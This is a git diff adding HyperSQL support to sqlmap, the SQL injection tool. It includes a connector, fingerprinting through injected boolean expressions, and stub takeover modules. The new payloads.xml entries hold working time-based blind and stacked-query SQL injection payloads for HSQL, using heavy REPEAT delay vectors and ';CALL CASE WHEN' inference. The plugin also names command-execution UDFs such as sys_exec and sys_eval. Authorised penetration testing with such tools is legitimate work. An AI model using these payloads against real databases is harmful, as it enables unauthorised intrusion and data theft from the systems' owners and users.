diff --git a/lib/controller/handler.py b/lib/controller/handler.py
index 399a4384e..91446e6bb 100644
--- a/lib/controller/handler.py
+++ b/lib/controller/handler.py
@@ -20,6 +20,7 @@ from lib.core.settings import FIREBIRD_ALIASES
 from lib.core.settings import MAXDB_ALIASES
 from lib.core.settings import SYBASE_ALIASES
 from lib.core.settings import DB2_ALIASES
+from lib.core.settings import HSQL_ALIASES
 from lib.utils.sqlalchemy import SQLAlchemy
 
 from plugins.dbms.mssqlserver import MSSQLServerMap
@@ -42,6 +43,8 @@ from plugins.dbms.sybase import SybaseMap
 from plugins.dbms.sybase.connector import Connector as SybaseConn
 from plugins.dbms.db2 import DB2Map
 from plugins.dbms.db2.connector import Connector as DB2Conn
+from plugins.dbms.hsql import HSQLMap
+from plugins.dbms.hsql.connector import Connector as HSQLConn
 
 def setHandler():
     """
@@ -60,6 +63,7 @@ def setHandler():
                   (DBMS.MAXDB, MAXDB_ALIASES, MaxDBMap, MaxDBConn),
                   (DBMS.SYBASE, SYBASE_ALIASES, SybaseMap, SybaseConn),
                   (DBMS.DB2, DB2_ALIASES, DB2Map, DB2Conn),
+                  (DBMS.HSQL, HSQL_ALIASES, HSQLMap, HSQLConn),
             ]
 
     _ = max(_ if (Backend.getIdentifiedDbms() or "").lower() in _[1] else None for _ in items)
diff --git a/lib/core/agent.py b/lib/core/agent.py
index 098543422..22ae053de 100644
--- a/lib/core/agent.py
+++ b/lib/core/agent.py
@@ -525,7 +525,7 @@ class Agent(object):
         else:
             return query
 
-        if Backend.isDbms(DBMS.MYSQL):
+        if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.HSQL):
             if fieldsExists:
                 concatenatedQuery = concatenatedQuery.replace("SELECT ", "CONCAT('%s'," % kb.chars.start, 1)
                 concatenatedQuery += ",'%s')" % kb.chars.stop
diff --git a/lib/core/common.py b/lib/core/common.py
index 702aefe17..5f2d38512 100644
--- a/lib/core/common.py
+++ b/lib/core/common.py
@@ -3448,7 +3448,11 @@ def decodeHexValue(value):
                     retVal = retVal.decode("utf-16-le")
                 except UnicodeDecodeError:
                     pass
-
+            elif Backend.isDbms(DBMS.HSQL):
+                try:
+                    retVal = retVal.decode("utf-16-be")
+                except UnicodeDecodeError:
+                    pass
             if not isinstance(retVal, unicode):
                 retVal = getUnicode(retVal, "utf8")
 
diff --git a/lib/core/dicts.py b/lib/core/dicts.py
index 48b2f9ca6..f072e676b 100644
--- a/lib/core/dicts.py
+++ b/lib/core/dicts.py
@@ -20,6 +20,7 @@ from lib.core.settings import FIREBIRD_ALIASES
 from lib.core.settings import MAXDB_ALIASES
 from lib.core.settings import SYBASE_ALIASES
 from lib.core.settings import DB2_ALIASES
+from lib.core.settings import HSQL_ALIASES
 
 FIREBIRD_TYPES = {
                     "261": "BLOB",
@@ -137,6 +138,7 @@ DBMS_DICT = {
                 DBMS.MAXDB: (MAXDB_ALIASES, None, None, "maxdb"),
                 DBMS.SYBASE: (SYBASE_ALIASES, "python-pymssql", "http://pymssql.sourceforge.net/", "sybase"),
                 DBMS.DB2: (DB2_ALIASES, "python ibm-db", "http://code.google.com/p/ibm-db/", "ibm_db_sa"),
+                DBMS.HSQL: (HSQL_ALIASES, "python jaydebeapi", "https://pypi.python.org/pypi/JayDeBeApi/", "hsql"),
             }
 
 FROM_DUMMY_TABLE = {
@@ -145,6 +147,7 @@ FROM_DUMMY_TABLE = {
                         DBMS.FIREBIRD: " FROM RDB$DATABASE",
                         DBMS.MAXDB: " FROM VERSIONS",
                         DBMS.DB2: " FROM SYSIBM.SYSDUMMY1",
+                        DBMS.HSQL: " FROM INFORMATION_SCHEMA.SYSTEM_USERS"
                    }
 
 SQL_STATEMENTS = {
@@ -186,7 +189,9 @@ SQL_STATEMENTS = {
 
                         "SQL data execution":    (
                              "exec ",
-                             "execute ",         ),
+                             "execute ",
+                             "values ", 
+                             "call ",            ),
 
                         "SQL transaction":       (
                              "start transaction ",
diff --git a/lib/core/enums.py b/lib/core/enums.py
index 204cd7919..e707ecc29 100644
--- a/lib/core/enums.py
+++ b/lib/core/enums.py
@@ -33,6 +33,7 @@ class DBMS:
     PGSQL = "PostgreSQL"
     SQLITE = "SQLite"
     SYBASE = "Sybase"
+    HSQL = "HyperSQL"
 
 class DBMS_DIRECTORY_NAME:
     ACCESS = "access"
@@ -45,6 +46,7 @@ class DBMS_DIRECTORY_NAME:
     PGSQL = "postgresql"
     SQLITE = "sqlite"
     SYBASE = "sybase"
+    HSQL = "hsql"
 
 class CUSTOM_LOGGING:
     PAYLOAD = 9
diff --git a/lib/core/settings.py b/lib/core/settings.py
index 39ac78b97..533125e9f 100644
--- a/lib/core/settings.py
+++ b/lib/core/settings.py
@@ -163,6 +163,7 @@ MAXDB_SYSTEM_DBS = ("SYSINFO", "DOMAIN")
 SYBASE_SYSTEM_DBS = ("master", "model", "sybsystemdb", "sybsystemprocs")
 DB2_SYSTEM_DBS = ("NULLID", "SQLJ", "SYSCAT", "SYSFUN", "SYSIBM", "SYSIBMADM", "SYSIBMINTERNAL", "SYSIBMTS",\
                    "SYSPROC", "SYSPUBLIC", "SYSSTAT", "SYSTOOLS")
+HSQL_SYSTEM_DBS = ("INFORMATION_SCHEMA", "SYSTEM_LOB")
 
 MSSQL_ALIASES = ("microsoft sql server", "mssqlserver", "mssql", "ms")
 MYSQL_ALIASES = ("mysql", "my")
@@ -174,10 +175,11 @@ FIREBIRD_ALIASES = ("firebird", "mozilla firebird", "interbase", "ibase", "fb")
 MAXDB_ALIASES = ("maxdb", "sap maxdb", "sap db")
 SYBASE_ALIASES = ("sybase", "sybase sql server")
 DB2_ALIASES = ("db2", "ibm db2", "ibmdb2")
+HSQL_ALIASES = ("hsql", "hsqldb", "hs", "hypersql")
 
 DBMS_DIRECTORY_DICT = dict((getattr(DBMS, _), getattr(DBMS_DIRECTORY_NAME, _)) for _ in dir(DBMS) if not _.startswith("_"))
 
-SUPPORTED_DBMS = MSSQL_ALIASES + MYSQL_ALIASES + PGSQL_ALIASES + ORACLE_ALIASES + SQLITE_ALIASES + ACCESS_ALIASES + FIREBIRD_ALIASES + MAXDB_ALIASES + SYBASE_ALIASES + DB2_ALIASES
+SUPPORTED_DBMS = MSSQL_ALIASES + MYSQL_ALIASES + PGSQL_ALIASES + ORACLE_ALIASES + SQLITE_ALIASES + ACCESS_ALIASES + FIREBIRD_ALIASES + MAXDB_ALIASES + SYBASE_ALIASES + DB2_ALIASES + HSQL_ALIASES
 SUPPORTED_OS = ("linux", "windows")
 
 USER_AGENT_ALIASES = ("ua", "useragent", "user-agent")
diff --git a/plugins/dbms/hsql/__init__.py b/plugins/dbms/hsql/__init__.py
new file mode 100644
index 000000000..4a360343a
--- /dev/null
+++ b/plugins/dbms/hsql/__init__.py
@@ -0,0 +1,39 @@
+#!/usr/bin/env python
+
+"""
+Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
+See the file 'doc/COPYING' for copying permission
+"""
+
+from lib.core.enums import DBMS
+from lib.core.settings import HSQL_SYSTEM_DBS
+from lib.core.unescaper import unescaper
+from plugins.dbms.hsql.enumeration import Enumeration
+from plugins.dbms.hsql.filesystem import Filesystem
+from plugins.dbms.hsql.fingerprint import Fingerprint
+from plugins.dbms.hsql.syntax import Syntax
+from plugins.dbms.hsql.takeover import Takeover
+from plugins.generic.misc import Miscellaneous
+
+class HSQLMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover):
+    """
+    This class defines MySQL methods
+    """
+
+    def __init__(self):
+        self.excludeDbsList = HSQL_SYSTEM_DBS
+        self.sysUdfs = {
+                         # UDF name:    UDF return data-type
+                         "sys_exec":    { "return": "int" },
+                         "sys_eval":    { "return": "string" },
+                         "sys_bineval": { "return": "int" }
+                       }
+
+        Syntax.__init__(self)
+        Fingerprint.__init__(self)
+        Enumeration.__init__(self)
+        Filesystem.__init__(self)
+        Miscellaneous.__init__(self)
+        Takeover.__init__(self)
+
+    unescaper[DBMS.HSQL] = Syntax.escape
diff --git a/plugins/dbms/hsql/connector.py b/plugins/dbms/hsql/connector.py
new file mode 100644
index 000000000..265249556
--- /dev/null
+++ b/plugins/dbms/hsql/connector.py
@@ -0,0 +1,91 @@
+#!/usr/bin/env python
+
+"""
+Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
+See the file 'doc/COPYING' for copying permission
+"""
+
+try:
+    from thirdparty import jaydebeapi
+    import jpype
+except ImportError, msg:
+    pass
+
+import logging
+
+from lib.core.data import conf
+from lib.core.data import logger
+from lib.core.exception import SqlmapConnectionException
+from plugins.generic.connector import Connector as GenericConnector
+
+class Connector(GenericConnector):
+    """
+    Homepage: http://jpype.sourceforge.net/
+    User guide: http://jpype.sourceforge.net/doc/user-guide/userguide.html
+    API: http://code.google.com/p/pymysql/
+    Debian package: <none>
+    License: Apache License V2.0
+    """
+
+    def __init__(self):
+        GenericConnector.__init__(self)
+
+    def connect(self):
+        self.initConnection()
+        try:
+            jar = './thirdparty/hsql/hsqldb.jar'
+            args='-Djava.class.path=%s' % jar
+            jvm_path = jpype.getDefaultJVMPath()
+            jpype.startJVM(jvm_path, args)
+        except (Exception), msg: #todo fix with specific error
+            raise SqlmapConnectionException(msg[0])
+        try:
+            driver = 'org.hsqldb.jdbc.JDBCDriver'
+            connection_string = 'jdbc:hsqldb:mem:.' #'jdbc:hsqldb:hsql://%s/%s' % (self.hostname, self.db)
+            self.connector = jaydebeapi.connect(driver,
+                                        connection_string,
+                                        str(self.user),
+                                        str(self.password))
+        except (Exception), msg: #todo what kind of error is this?!
+            raise SqlmapConnectionException(msg[0])
+
+        self.initCursor()
+        self.printConnected()
+
+    def fetchall(self):
+        try:
+            return self.cursor.fetchall()
+        except (Exception), msg:
+            logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % msg[1])
+            return None
+
+    def execute(self, query):
+        retVal = False
+
+        try:
+            self.cursor.execute(query)
+            retVal = True
+        except (Exception), msg: #todo fix with specific error
+            logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % msg[1])
+        except Exception, msg: #todo fix with specific error
+            raise SqlmapConnectionException(msg[1])
+
+        self.connector.commit()
+
+        return retVal
+
+    def select(self, query):
+        retVal = None
+
+        upper_query = query.upper()
+
+        if query and not (upper_query.startswith("SELECT ") or upper_query.startswith("VALUES ")):
+            query = "VALUES %s" % query
+
+        if query and upper_query.startswith("SELECT ") and " FROM " not in upper_query:
+            query = "%s FROM (VALUES(0))" % query
+
+        self.cursor.execute(query)
+        retVal = self.cursor.fetchall()
+
+        return retVal
diff --git a/plugins/dbms/hsql/enumeration.py b/plugins/dbms/hsql/enumeration.py
new file mode 100644
index 000000000..a9bc518be
--- /dev/null
+++ b/plugins/dbms/hsql/enumeration.py
@@ -0,0 +1,33 @@
+#!/usr/bin/env python
+
+"""
+Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
+See the file 'doc/COPYING' for copying permission
+"""
+
+from plugins.generic.enumeration import Enumeration as GenericEnumeration
+from lib.core.data import conf
+from lib.core.data import kb
+from lib.core.data import logger
+from lib.core.data import queries
+from lib.core.common import Backend
+from lib.core.common import unArrayizeValue
+from lib.request import inject
+from lib.parse.banner import bannerParser
+
+class Enumeration(GenericEnumeration):
+    def __init__(self):
+        GenericEnumeration.__init__(self)
+
+    def getBanner(self):
+        if not conf.getBanner:
+            return
+
+        if kb.data.banner is None:
+            infoMsg = "fetching banner"
+            logger.info(infoMsg)
+
+            query = queries[Backend.getIdentifiedDbms()].banner.query
+            kb.data.banner = unArrayizeValue(inject.getValue(query, safeCharEncode=True))
+
+        return kb.data.banner
diff --git a/plugins/dbms/hsql/filesystem.py b/plugins/dbms/hsql/filesystem.py
new file mode 100644
index 000000000..558b59c53
--- /dev/null
+++ b/plugins/dbms/hsql/filesystem.py
@@ -0,0 +1,21 @@
+#!/usr/bin/env python
+
+"""
+Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
+See the file 'doc/COPYING' for copying permission
+"""
+
+from lib.core.exception import SqlmapUnsupportedFeatureException
+from plugins.generic.filesystem import Filesystem as GenericFilesystem
+
+class Filesystem(GenericFilesystem):
+    def __init__(self):
+        GenericFilesystem.__init__(self)
+
+    def readFile(self, rFile):
+        errMsg = "Not implemented in HSQL"
+        raise SqlmapUnsupportedFeatureException(errMsg)
+
+    def writeFile(self, wFile, dFile, fileType=None, forceCheck=False):
+        errMsg = "Not implemented in HSQL"
+        raise SqlmapUnsupportedFeatureException(errMsg)
diff --git a/plugins/dbms/hsql/fingerprint.py b/plugins/dbms/hsql/fingerprint.py
new file mode 100644
index 000000000..9bb0eb11c
--- /dev/null
+++ b/plugins/dbms/hsql/fingerprint.py
@@ -0,0 +1,146 @@
+#!/usr/bin/env python
+
+"""
+Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
+See the file 'doc/COPYING' for copying permission
+"""
+
+import re
+
+from lib.core.common import Backend
+from lib.core.common import Format
+from lib.core.common import getUnicode
+from lib.core.common import unArrayizeValue
+from lib.core.data import conf
+from lib.core.data import kb
+from lib.core.data import logger
+from lib.core.enums import DBMS
+from lib.core.enums import OS
+from lib.core.session import setDbms
+from lib.core.settings import HSQL_ALIASES
+from lib.core.settings import UNKNOWN_DBMS_VERSION
+from lib.request import inject
+from plugins.generic.fingerprint import Fingerprint as GenericFingerprint
+
+class Fingerprint(GenericFingerprint):
+    def __init__(self):
+        GenericFingerprint.__init__(self, DBMS.HSQL)
+
+    def getFingerprint(self):
+        value = ""
+        wsOsFp = Format.getOs("web server", kb.headersFp)
+
+        if wsOsFp and not hasattr(conf, "api"):
+            value += "%s\n" % wsOsFp
+
+        if kb.data.banner:
+            dbmsOsFp = Format.getOs("back-end DBMS", kb.bannerFp)
+
+            if dbmsOsFp and not hasattr(conf, "api"):
+                value += "%s\n" % dbmsOsFp
+
+        value += "back-end DBMS: "
+        actVer = Format.getDbms()
+
+        if not conf.extensiveFp:
+            value += actVer
+            return value
+
+        blank = " " * 15
+        value += "active fingerprint: %s" % actVer
+
+        if kb.bannerFp:
+            banVer = kb.bannerFp["dbmsVersion"] if 'dbmsVersion' in kb.bannerFp else None
+
+            if re.search("-log$", kb.data.banner):
+                banVer += ", logging enabled"
+
+            banVer = Format.getDbms([banVer] if banVer else None)
+            value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer)
+
+        htmlErrorFp = Format.getErrorParsedDBMSes()
+
+        if htmlErrorFp:
+            value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp)
+
+        return value
+
+    def checkDbms(self):
+        """
+        References for fingerprint:
+        DATABASE_VERSION()
+        version 2.2.6 added two-arg REPLACE functio REPLACE('a','a') compared to REPLACE('a','a','d')
+        version 2.2.5 added SYSTIMESTAMP function
+        version 2.2.3 added REGEXPR_SUBSTRING and REGEXPR_SUBSTRING_ARRAY functions
+        version 2.2.0 added support for ROWNUM() function
+        version 2.1.0 added MEDIAN aggregate function
+        version < 2.0.1 added support for datetime ROUND and TRUNC functions
+        version 2.0.0 added VALUES support
+        version 1.8.0.4 Added org.hsqldb.Library function, getDatabaseFullProductVersion to return the
+                        full version string, including the 4th digit (e.g 1.8.0.4).
+        version 1.7.2 CASE statements added and INFORMATION_SCHEMA
+         
+        """
+
+        if not conf.extensiveFp and (Backend.isDbmsWithin(HSQL_ALIASES) \
+           or conf.dbms in HSQL_ALIASES) and Backend.getVersion() and \
+           Backend.getVersion() != UNKNOWN_DBMS_VERSION:
+            v = Backend.getVersion().replace(">", "")
+            v = v.replace("=", "")
+            v = v.replace(" ", "")
+
+            Backend.setVersion(v)
+
+            setDbms("%s %s" % (DBMS.HSQL, Backend.getVersion()))
+
+            if Backend.isVersionGreaterOrEqualThan("1.7.2"):
+                kb.data.has_information_schema = True
+
+            self.getBanner()
+
+            return True
+
+        infoMsg = "testing %s" % DBMS.HSQL
+        logger.info(infoMsg)
+
+        # TODO This gets mangled in UNION queries because of the dummy table
+        result = inject.checkBooleanExpression("\"java.lang.Math.sqrt\"(1)=1")
+
+        if result:
+            infoMsg = "confirming %s" % DBMS.HSQL
+            logger.info(infoMsg)
+
+            result = inject.checkBooleanExpression("ROUNDMAGIC(PI())>=3")
+
+            if not result:
+                warnMsg = "the back-end DBMS is not %s" % DBMS.HSQL
+                logger.warn(warnMsg)
+
+                return False
+            else:
+                kb.data.has_information_schema = True
+                Backend.setVersion(">= 1.7.2")
+                setDbms("%s 1.7.2" % DBMS.HSQL)
+
+                if not conf.extensiveFp:
+                    return True
+
+                banner = self.getBanner()
+                if banner:
+                    Backend.setVersion("= %s" % banner)
+                else:
+                    if inject.checkBooleanExpression("(SELECT [RANDNUM] FROM (VALUES(0)))=[RANDNUM]"):
+                        Backend.setVersionList([">= 2.0.0", "< 2.3.0"])
+                    else:
+                        banner = unArrayizeValue(inject.getValue("\"org.hsqldb.Library.getDatabaseFullProductVersion\"()", safeCharEncode=True))
+                        if banner:
+                            Backend.setVersion("= %s" % banner)
+                        else:
+                            Backend.setVersionList([">= 1.7.2", "< 1.8.0"])
+
+            return True
+        else:
+            warnMsg = "the back-end DBMS is not %s or is < 1.7.2" % DBMS.HSQL
+            logger.warn(warnMsg)
+
+            return False
diff --git a/plugins/dbms/hsql/syntax.py b/plugins/dbms/hsql/syntax.py
new file mode 100644
index 000000000..1d0eefcb3
--- /dev/null
+++ b/plugins/dbms/hsql/syntax.py
@@ -0,0 +1,26 @@
+#!/usr/bin/env python
+
+"""
+Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
+See the file 'doc/COPYING' for copying permission
+"""
+
+import binascii
+
+from lib.core.convert import utf8encode
+from plugins.generic.syntax import Syntax as GenericSyntax
+
+class Syntax(GenericSyntax):
+    def __init__(self):
+        GenericSyntax.__init__(self)
+
+    @staticmethod
+    def escape(expression, quote=True):
+        """
+        >>> Syntax.escape("SELECT 'abcdefgh' FROM foobar")
+        'SELECT CHAR(97)||CHAR(98)||CHAR(99)||CHAR(100)||CHAR(101)||CHAR(102)||CHAR(103)||CHAR(104) FROM foobar'
+        """
+        def escaper(value):
+            return "||".join("CHAR(%d)" % ord(value[i]) for i in xrange(len(value)))
+
+        return Syntax._escape(expression, quote, escaper)
diff --git a/plugins/dbms/hsql/takeover.py b/plugins/dbms/hsql/takeover.py
new file mode 100644
index 000000000..40a04722c
--- /dev/null
+++ b/plugins/dbms/hsql/takeover.py
@@ -0,0 +1,29 @@
+#!/usr/bin/env python
+
+"""
+Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
+See the file 'doc/COPYING' for copying permission
+"""
+
+from lib.core.exception import SqlmapUnsupportedFeatureException
+from plugins.generic.takeover import Takeover as GenericTakeover
+
+class Takeover(GenericTakeover):
+    def __init__(self):
+        GenericTakeover.__init__(self)
+
+    def osCmd(self):
+        errMsg = "Not implemented in HSQL"
+        raise SqlmapUnsupportedFeatureException(errMsg)
+
+    def osShell(self):
+        errMsg = "Not implemented in HSQL"
+        raise SqlmapUnsupportedFeatureException(errMsg)
+
+    def osPwn(self):
+        errMsg = "Not implemented in HSQL"
+        raise SqlmapUnsupportedFeatureException(errMsg)
+
+    def osSmb(self):
+        errMsg = "Not implemented in HSQL"
+        raise SqlmapUnsupportedFeatureException(errMsg)
diff --git a/plugins/generic/databases.py b/plugins/generic/databases.py
index c37fad3b3..57f93b203 100644
--- a/plugins/generic/databases.py
+++ b/plugins/generic/databases.py
@@ -510,7 +510,7 @@ class Databases:
                 infoMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(conf.db)
                 logger.info(infoMsg)
 
-                if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL):
+                if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQL):
                     query = rootQuery.inband.query % (unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(conf.db))
                     query += condQuery
                 elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2):
diff --git a/plugins/generic/entries.py b/plugins/generic/entries.py
index b381f1e97..64a74b4c0 100644
--- a/plugins/generic/entries.py
+++ b/plugins/generic/entries.py
@@ -159,7 +159,7 @@ class Entries:
                                 entries = zip(*[entries[colName] for colName in colList])
                         else:
                             query = rootQuery.inband.query % (colString, conf.db, tbl)
-                    elif Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL):
+                    elif Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQL):
                         query = rootQuery.inband.query % (colString, conf.db, tbl, prioritySortColumns(colList)[0])
                     else:
                         query = rootQuery.inband.query % (colString, conf.db, tbl)
diff --git a/xml/payloads.xml b/xml/payloads.xml
index 4adee7003..a6c17485b 100644
--- a/xml/payloads.xml
+++ b/xml/payloads.xml
@@ -1127,7 +1127,6 @@ Formats:
     </test>
     <!-- End of stacked conditional-error blind queries tests -->
 
-
     <!-- Error-based tests - WHERE or HAVING clause -->
     <test>
         <title>MySQL &gt;= 5.0 AND error-based - WHERE or HAVING clause</title>
@@ -1878,7 +1877,6 @@ Formats:
     -->
     <!-- End of error-based tests - GROUP BY and ORDER BY clauses -->
 
-
     <!-- Inline queries tests -->
     <test>
         <title>MySQL inline queries</title>
@@ -1996,7 +1994,6 @@ Formats:
     </test>
     <!-- End of inline queries tests -->
 
-
     <!-- Stacked queries tests -->
     <test>
         <title>MySQL &gt; 5.0.11 stacked queries</title>
@@ -2245,6 +2242,48 @@ Formats:
             <dbms_version>&gt;= 2.0</dbms_version>
         </details>
     </test>
+	
+	<test>
+        <title>HSQL &gt;= 1.7.2 Server stacked queries</title>
+        <stype>4</stype>
+        <level>1</level>
+        <risk>0</risk>
+        <clause>0</clause>
+        <where>1</where>
+        <vector>;CALL CASE WHEN ([INFERENCE]) THEN REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000) END</vector>
+        <request>
+            <payload>;CALL REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000)</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>HSQL</dbms>
+			<dbms_version>&gt;= 1.7.2</dbms_version>
+        </details>
+    </test>
+	
+    <test>
+        <title>HSQL &gt;= 2.0 Server stacked queries</title>
+        <stype>4</stype>
+        <level>1</level>
+        <risk>0</risk>
+        <clause>0</clause>
+        <where>1</where>
+        <vector>;CALL CASE WHEN ([INFERENCE]) THEN REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000) END</vector>
+        <request>
+            <payload>;CALL REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000)</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>HSQL</dbms>
+            <dbms_version>&gt;= 2.0</dbms_version>
+        </details>
+    </test>
     <!-- TODO: if possible, add payload for Microsoft Access and SAP MaxDB -->
     <!-- End of stacked queries tests -->
 
@@ -2712,6 +2751,88 @@ Formats:
             <dbms>IBM DB2</dbms>
         </details>
     </test>
+	
+    <test>
+        <title>HSQL &gt;= 1.7.2 AND time-based blind (heavy query)</title>
+        <stype>5</stype>
+        <level>2</level>
+        <risk>2</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000) ELSE '[RANDSTR]' END</vector>
+        <request>
+            <payload>AND '[RANDSTR]'=REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000)</payload>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>HSQL</dbms>
+            <dbms_version>&gt;= 1.7.2</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>HSQL &gt;= 1.7.2 AND time-based blind (heavy query - comment)</title>
+        <stype>5</stype>
+        <level>5</level>
+        <risk>2</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000) ELSE '[RANDSTR]' END</vector>
+        <request>
+            <payload>AND '[RANDSTR]'=REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000)</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>HSQL</dbms>
+            <dbms_version>&gt;= 1.7.2</dbms_version>
+        </details>
+    </test>
+	
+    <test>
+        <title>HSQL &gt; 2.0 AND time-based blind (heavy query)</title>
+        <stype>5</stype>
+        <level>2</level>
+        <risk>2</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000) ELSE '[RANDSTR]' END</vector>
+        <request>
+            <payload>AND '[RANDSTR]'=REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000)</payload>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>HSQL</dbms>
+            <dbms_version>&gt; 2.0</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>HSQL &gt; 2.0 AND time-based blind (heavy query - comment)</title>
+        <stype>5</stype>
+        <level>5</level>
+        <risk>2</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000) ELSE '[RANDSTR]' END</vector>
+        <request>
+            <payload>AND '[RANDSTR]'=REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000)</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>HSQL</dbms>
+            <dbms_version>&gt; 2.0</dbms_version>
+        </details>
+    </test>
     <!-- TODO: if possible, add payload for Microsoft Access -->
     <!-- End of AND time-based blind tests -->
 
@@ -2931,6 +3052,88 @@ Formats:
             <dbms>IBM DB2</dbms>
         </details>
     </test>
+	
+    <test>
+        <title>HSQL &gt;= 1.7.2 OR time-based blind (heavy query)</title>
+        <stype>5</stype>
+        <level>2</level>
+        <risk>2</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000) ELSE '[RANDSTR]' END</vector>
+        <request>
+            <payload>OR '[RANDSTR]'=REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000)</payload>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>HSQL</dbms>
+			<dbms_version>&gt;= 1.7.2</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>HSQL &gt;= 1.7.2 OR time-based blind (heavy query - comment)</title>
+        <stype>5</stype>
+        <level>5</level>
+        <risk>2</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000) ELSE '[RANDSTR]' END</vector>
+        <request>
+            <payload>OR '[RANDSTR]'=REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000)</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>HSQL</dbms>
+            <dbms_version>&gt;= 1.7.2</dbms_version>
+        </details>
+    </test>	
+	
+    <test>
+        <title>HSQL &gt; 2.0 OR time-based blind (heavy query)</title>
+        <stype>5</stype>
+        <level>2</level>
+        <risk>2</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000) ELSE '[RANDSTR]' END</vector>
+        <request>
+            <payload>OR '[RANDSTR]'=REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000)</payload>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>HSQL</dbms>
+			<dbms_version>&gt; 2.0</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>HSQL &gt; 2.0 OR time-based blind (heavy query - comment)</title>
+        <stype>5</stype>
+        <level>5</level>
+        <risk>2</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000) ELSE '[RANDSTR]' END</vector>
+        <request>
+            <payload>OR '[RANDSTR]'=REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000)</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>HSQL</dbms>
+            <dbms_version>&gt; 2.0</dbms_version>
+        </details>
+    </test>
     <!-- TODO: if possible, add payload for Microsoft Access -->
     <!-- End of OR time-based blind tests -->
 
@@ -3211,7 +3414,7 @@ Formats:
     </test>
 
     <test>
-        <title>IBM DB2 AND time-based blind (heavy query)</title>
+        <title>IBM DB2 time-based blind - Parameter replace (heavy query)</title>
